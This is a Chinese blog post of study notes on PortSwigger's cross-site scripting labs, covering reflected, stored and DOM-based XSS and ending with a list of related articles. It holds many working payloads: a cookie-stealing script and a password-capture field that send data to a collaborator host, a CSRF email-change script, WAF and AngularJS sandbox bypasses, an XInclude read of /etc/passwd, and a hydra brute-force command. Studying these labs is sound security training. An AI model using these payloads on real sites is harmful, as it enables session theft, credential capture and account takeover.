PortSwigger 跨站点脚本(XSS)

原创 已于 2024-12-03 15:49:40 修改 · 1.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #javascript #html #web安全 #安全

于 2022-11-30 16:12:07 首次发布

一、反射型 XSS

        1、什么是反射型 XSS?

        当应用程序在 HTTP 请求中接收数据并以不安全的方式将该数据包含在即时响应中时,就会出现反射式跨站点脚本。如:将XSS反射到HTML上下文中,没有进行转义

https://insecure-website.com/search?term=<script>alert(1)</script>

        2、利用XSS漏洞可以干嘛?

                (1)利用跨站点脚本窃取 cookie

<script>
fetch('https://sgcgvts1zzg794zz17vu2dbfd6jx7m.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

                (2)利用跨站点脚本捕获密码

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

                (3)利用跨站点脚本执行 CSRF

//当请求完成时触发保存返回报文
req.onload = handleResponse;
//创造请求
req.open('get','/my-account',true);
//发送请求
req.send();
function handleResponse() {
//获取token,(\W+):匹配一个或多个非字母进行切割,匹配到的非字母全部缓存;
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=wiener@normal-user.net')
};
</script>

        3、如何利用-01 反射到上下文中的XSS

                (1)将XSS反射到HTML上下文中,未进行任何编码

<script>alert(1)</script>

                (2)将 XSS 反射到 HTML 上下文中,但大多数标签和事件都被阻止了

                        解题思路:通过Burp Suite 暴力破解先找到未被阻止的标签:body,继而确定未被阻止的事件;onresize,最后通过该标签和事件进行利用。如:

<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>

                (3)将 XSS 反射到 HTML 上下文中,阻止除自定义标签之外的所有标签

        tabindex属性:将首先移动到具有最小tabIndex属性值的控件上,最后在具有最大tabIndex属性值的控件上结束移动。如果有两个控件的tabIndex属性相同,则以控件在html代码中出现的顺序为准。默认的tabIndex属性为 0 ,将排列在在所有指定tabIndex的控件之后。而若把tabIndex属性设为一个负值(如tabIndex="-1"),那么这个链接将被排除在TAB键的序列之外

https://YOUR-LAB-ID.web-security-academy.net/?search=<xss+id=x+onfocus=alert(document.cookie) tabindex=1>#x

                (4)事件和属性都阻止的反射到href执行的反射式 XSS

        animate:元素可以用于实现动画效果

        attributeName:定义发生变化的元素属性名

<svg><a><animate+attributeName=href+values=javascript:alert(1)+/><text+x=20+y=20>Click me</text></a>

                (5)允许使用一些 SVG 标签的反射式 XSS

        animatetransform标签:进行动画处理

        onBegin() :当元素周期开始时由onbegin 事件立即触发

<svg><animatetransform%20onbegin=alert(1)>

        4、如何利用-02 反射到HTML 标记属性中的 XSS            

                (1)将 XSS 反射到带有尖括号 HTML 编码的属性中

        onmouseover事件:当鼠标移到该元素之上触发事件

"onmouseover="alert(1)

                (2)规范链接标记中的反射 XSS

        accesskey 属性:规定激活(使元素获得焦点)元素的快捷键

        当用户使用以下快捷键将触发漏洞

  •                        在视窗上:ALT+SHIFT+X
    •                 在 MacOS 上:CTRL+ALT+X
      •          在 Linux 上:Alt+X
url?'accesskey='x'onclick='alert(1)

        5、如何利用-03 反射到JavaScript 代码中的XSS

                (1)终止现有的JavaScript脚本进行反射注入

</script><script>alert(1)</script>

                (2) 打破现有的JavaScript字符串进行反射注入

'-alert(document.domain)-'
';alert(document.domain)//

                (3)单引号被转义时,通过JavaScript进行反射注入

\'-alert(1)//

                (4)某些字符被阻止,通过JavaScript进行反射注入

&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'

                (5) 应用程序阻止或转义单引号字符,通过利用HTML编码进行绕过

                &apos=‘

                onclick 事件会在元素被点击时发生

http://foo?&apos;-alert(1)-&apos;

                 (6)将javaScript 表达式嵌入到字符串模板文本中执行,进行反射注入

${alert(document.domain)}

        6、如何利用-04 通过客户端模板注入利用

                (1)反射式XSS与AngularJS沙盒无字符串绕过

                AngularJS 沙箱是一种机制,可防止访问 AngularJS 模板表达式中的潜在危险对象

&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

                (2)使用 AngularJS 沙盒转义绕过 CSP

                内容安全策略(CSP):当 CSP 模式在 AngularJS 中处于活动状态时,它会以不同的方式解析模板表达式,并避免使用构造函数


https://YOUR-LAB-ID.web-security-academy.net/?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x

二、存储型XSS

        1、什么是存储型XSS

        当应用程序从不受信任的源接收数据并以不安全的方式将该数据包含在其以后的 HTTP 响应中时,就会出现存储的 XSS(也称为持久或二阶 XSS。

        2、如何利用存储型XSS

                (1)将XSS存储到HTML上下文中,没有任何编码 

<script>alert(1)</script>

                 (2)将 XSS 存储到带有双引号 HTML 编码的锚点属性href中

javascript:alert(document.domain)

                (3)将 XSS 存储到带有双引号 HTML 编码中,并通过HTML编码进行绕过 

http://foo?&apos;-alert(1)-&apos;

三、DOM型XSS

        1、什么是DOM型XSS

        DOM型XSS漏洞是一种特殊类型的XSS,是基于文档对象模型 Document Object Model (DOM)的一种漏洞。

        2、如何利用DOM型XSS

                (1)当接收器存在适用的元素  (document.write  location.search)

“> <svg onload=alert(1)>

                (2)当接收器中使用选择元素时,通过闭合该元素进行绕过(document.write  location.search)

</select><img src=1 onerror=alert(1)>

                (3)接收器不接受任何新式浏览器上的元素,也不会触发事件时,存在innerHTML时可向对象插入内容。

             innerHTML:在JS是双向功能:获取对象的内容 或 向对象插入内容

<img src=1 onerror=alert(1)>

                 (4)使用哈希更改事件在 jQuery 选择器接收器中的 DOM XSS

<iframe src="https://0a36003c0488ebe5c2948a0200b70043.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

                 (5)AngularJS表达式中的DOM XSS,在双大括号内执行 JavaScript 表达式。

{{$on.constructor('alert(1)')()}}

                 (6)反射式 DOM XSS

\"-alert(1)}//

                (7)存储的 DOM XSS

<><img src=1 onerror=alert(1)>

四、其他利用 

        XML 片段 <ezm xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></ezm> 试图利用 XInclude 技术从本地文件系统加载 /etc/passwd 文件的内容。

<ezm xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/>

XSS总结:跨站脚本XSS)攻击向量(精)
墨痕诉清风的博客
10-13 552
事件处理 不需要用户交互的事件处理程序 激活元素时触发(IE) <a id=x tabindex=1 onactivate=alert(1)></a> 页面打印后触发(Chrome、Firefox、IE) <body onafterprint=alert(1)> CSS动画取消时触发(Firefox) <style>@keyfra......
Lab: Reflected XSS into HTML context with most tags and attributes blocked:将 XSS 反射到 HTML 上下文中,大多数标签...
Zeker62的博客
08-25 465
靶场内容 本实验室在搜索功能中包含一个反射型 XSS漏洞,但使用 Web 应用程序防火墙 (WAF) 来防御常见的 XSS 向量。 要解决实验室问题,请执行绕过 WAF 并调用该函数的跨站脚本攻击print()。 注意 注意 您的解决方案不得要求任何用户交互。手动导致print()在您自己的浏览器中调用不会解决实验室问题。您的解决方案不得要求任何用户交互。手动导致print()在您自己的浏览...
【网络安全XSS漏洞——PortSwigger靶场-DOM破坏
2301_79915754的博客
08-26 1147
本文分析了利用DOM破坏技术绕过XSS防御的案例。研究发现目标网站使用DOMPurify框架过滤XSS,但存在通过DOM破坏覆盖window.defaultAvatar属性的漏洞。通过构造特殊HTML元素(如带name属性的a标签)可控制头像图片的src属性,最终实现XSS攻击。文章提供了完整攻击链分析,包括漏洞定位、payload构造和绕过技巧,并建议通过对象类型检查等方法来防御DOM破坏攻击。该案例展示了前端安全防护中DOM操作可能带来的安全隐患。
Portwigge的Web安全漏洞训练平台SSRF通关
st3pby的博客
11-16 2192
Portwigge的Web安全漏洞训练平台SSRF通关
PortSwigger靶场Reflected XSS into HTML context with most tags and attributes blockedPRACTITIONERLA通关秘籍
最新发布
m0_65361643的博客
09-17 883
摘要:该靶场要求绕过WAF实现反射型XSS自动触发print()函数。通过测试发现< body >标签和onresize事件未被过滤,构造载荷< body onresize=print() >成功注入但未自动触发。最终利用ExploitServer构造iframe载荷,通过动态调整iframe宽度强制触发onresize事件,成功实现无交互的XSS攻击。整个过程展示了如何通过冷门标签和事件组合绕过WAF防护。
API测试()PortSwigger靶场笔记
aaaadoga的博客
07-14 1296
这篇文章是关于作者在学习PortSwigger的API Test类型漏洞时的记录和学习笔记
portswigger_文件上传漏洞
(∪.∪ )...zzz的博客
05-13 1358
这里写自定义目录标题一、是啥1. 什么是文件上传漏洞2. 文件上传漏洞如何出现3. web服务器如何处理静态的文件请求二、类型1. 任意上传以部署webshelllab:上传webshell进行远程代码执行2. 文件类型验证存在缺陷lab:上传webshell 通过Content-Type 限制绕过3. 防止文件执行lab:上传webshell通过目录遍历4. 黑名单不足4.1 覆盖服务器配置lab: 通过黑名单之外的上传webshell——.htaccess4.2 混淆文件后缀lab5:文件后缀混淆来绕过
PortswiggerXSS:收集XSS备忘单有效载荷并创建可用的单词表
04-25
PortswiggerXSS 收集备忘单有效载荷并创建可用的单词表 谢谢您所做的一切令人惊奇的工作和努力 :red_heart: 只需按原样构建或运行脚本,不需要args。 其余的应该为您处理。 免责声明:不是最干净的代码,但它可以工作:) 备忘单: : 感谢ArenasDev添加以下参数和功能:-tag用于标签过滤-event用于事件过滤-filename用于设置过滤列表的名称-update强制更新(如果存在有效负载文件,则不会更新) 执照 我只是一个简单的滑行。 许可对我来说不是什么大问题,我在网上发布对我有帮助的内容,希望其他人可以: A)从代码中学习B)与代码一起使用或C)只需要嘲笑某件事即可使自己感觉更好 无论哪种方式,如果这对您有帮助-太酷了:)
portswigger靶场 XSS3
Looooood的博客
03-04 1638
XSS
PortSwigger Cross-site scripting(xss实验详解,小白也可以看懂!!)
2201_75445650的博客
05-03 1585
PortSwigger XSS实验详解(小白也可以看懂!)
PortSwigger web实验室-XSS篇上(BP靶场)
2301_79933930的博客
08-15 1763
Hello 大家好!经过一段时间的学习,我整理了一些思考并准备分享给大家。这期笔记将围绕 BP 靶场中的 XSS 漏洞,分享我在解题过程中积累的经验和一些心得体会。由于 XSS 板块的题目比较多,本文会分为上下两篇进行讲解。在这里,我尽力详细地记录了每一个步骤和要,但由于时间有限,文中可能有些地方写得不够清晰或准确。如果大家有不同的见解或发现错误,欢迎批评指正,大家共同进步!希望这篇笔记能对正在学习 XSS 的同学有所帮助,也期待大家的反馈与讨论。让我们一起探索这个充满挑战的领域!⁂((✪⥎✪))⁂。
PortSwigger Academy | Cross-site request forgery (CSRF) : 跨站请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
02-02 1898
文章目录什么是CSRF?CSRF攻击有什么影响?CSRF如何工作?使用SameSite Cookie防御CSRF如何构造CSRF攻击Lab: CSRF vulnerability with no defenses如何进行CSRF攻击XSS vs CSRFXSS和CSRF有什么区别?CSRF令牌可以阻止XSS攻击吗?防止CSRF攻击CSRF token什么是CSRF令牌?CSRF令牌应如何生成?CSRF令牌应如何传输?CSRF令牌应如何验证?常见的CSRF漏洞CSRF令牌的验证取决于请求方法Lab: CSRF
Portswigger-web-security-academy】xss lab
No Title
12-29 788
Lab: Reflected XSS into HTML context with all tags blocked except custom ones 题目提示是拦截了所有html标签,只能使用自定义标签。先尝试在搜索框中写入自定义标签: <custom id=test> 查看网页源代码: <header class="notification-header"> </header> <section class=blog-header> &l
PortSwigger30连环靶场XSS跨站脚本攻击—基础篇
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
05-28 713
PortSwigger XSS靶场—基础篇 攻略向...
Postswigger 靶场 XSS 通关
来日可期的博客
12-12 1618
找到了注入位置,在a标签的href中,那么我们就可以构造攻击代码了,这里采用伪协议的方式,在Website中来构造攻击代码。观察发现,参数returnPath的值会回显到href属性中,底下的script中的代码也验证了。发现我们的攻击代码被传递到了img标签中,这里我们可以尝试将该标签闭合。页面将我们输入的攻击代码传递到了input标签的value参数中。查看页面源代码发现尖括号,反斜杠,单引号,双引号已经被编码了。发现我们的攻击代码被传入到了一个span标签中,构造攻击代码。
【无标题】【portswigger】第二专题-XSS(一)
人间体佐菲的博客
07-26 717
视频同步更新至bilibilibilibili地址欢迎关注微信公众号:微光安全团队这一篇文章是一个关于xss的简单总结首先你需要有一的js知识最起码知道什么东西都是干什么的其次,你要对xss进行一个简单的分类常规来说有反射型,存储型,dom型,但我觉得这些都没啥用,知道不知道没什么不同所以我就简单的按照一些xss注入来说。
PortSwigger(八)跨站脚本XSS漏洞
weixin_52835927的博客
11-06 796
/script>单击“存储”和“向受害者提供漏洞”。此注入创建一个带有 ID 的自定义标签,其中包含触发函数的事件处理程序。URL 末尾的哈希值在页面加载后立即聚焦于此元素,从而导致调用有效负载。
渗透测试靶场PortSwiggerLabs-xss(1-10)lab详解
ericalezl的博客
05-25 1267
XSS 反射到未编码的 HTML 上下文中。
PortSwigger 跨站请求伪造 (CSRF)
weixin_42451330的博客
12-10 1116
本文介绍PortSwigger靶场 跨站请求伪造 (CSRF),包括CSRF介绍及利用手法。如有疑问欢迎私聊。
BurpSuite配合portswigger
02-19
### 使用 Burp Suite 结合 Portswigger 功能进行安全测试 #### 安装与配置 Burp Suite Burp Suite 是一款专为攻击和测试 Web 应用程序安全性设计的强大工具,适用于安全测试、渗透测试以及开发人员使用[^1]。为了充分利用其功能,建议从官方网址 https://portswigger.net/burp 下载并安装最新版本的 Burp Suite 社区版或专业版[^3]。 #### 配置浏览器代理设置 启动 Burp Suite 后,默认情况下会监听本地端口 8080。因此,在开始之前,需确保已正确设置了浏览器的代理服务器指向 `localhost` 的 8080 端口。这一步骤对于捕获 HTTP/HTTPS 流量至关重要。 #### 利用 Burp Scanner 执行自动化扫描 PortSwigger 提供了名为 Burp Scanner 的强大组件,能够自动检测常见的漏洞类型,如 SQL 注入、跨站脚本XSS)、远程文件包含等。要启用此特性: 1. 导航至站地图中的目标 URL; 2. 右键击节选择 "Engagement tools" -> "Scan this branch..." 或者单个请求 “Send to Intruder” 来发起更复杂的攻击模式; 3. 设置好参数后击 OK 即可让 Burp 自动执行一系列预定义的安全检查[^2]。 #### 实施手动审查与验证 尽管自动化工具有助于快速识别潜在风险,但对于某些特定场景下的高级威胁分析来说还不够充分。此时可以借助 Repeater 和 Decoder 工具来辅助人工审计过程: - **Repeater**: 修改拦截下来的HTTP(S) 请求后再发送出去观察响应变化情况;这对于探索输入验证机制特别有用。 - **Decoder**: 对编码后的字符串解码查看原始数据形式,帮助理解隐藏字段含义或是绕过简单的防护措施。 #### 开展暴力破解尝试 针对登录表单或其他认证接口实施密码猜测活动前,请务必获得合法授权许可以免触犯法律。利用内置插件 Infiltrator 或第三方扩展 Hydra 插件配合字典库来进行账户枚举实验: ```bash hydra -l admin -P /path/to/passwords.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" ``` 上述命令表示采用 POST 方法提交用户名 (`admin`) 和密码列表 (`passwords.txt`) 至 `/login.php` 路径,并指定失败提示词 ("incorrect") 作为判断依据。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值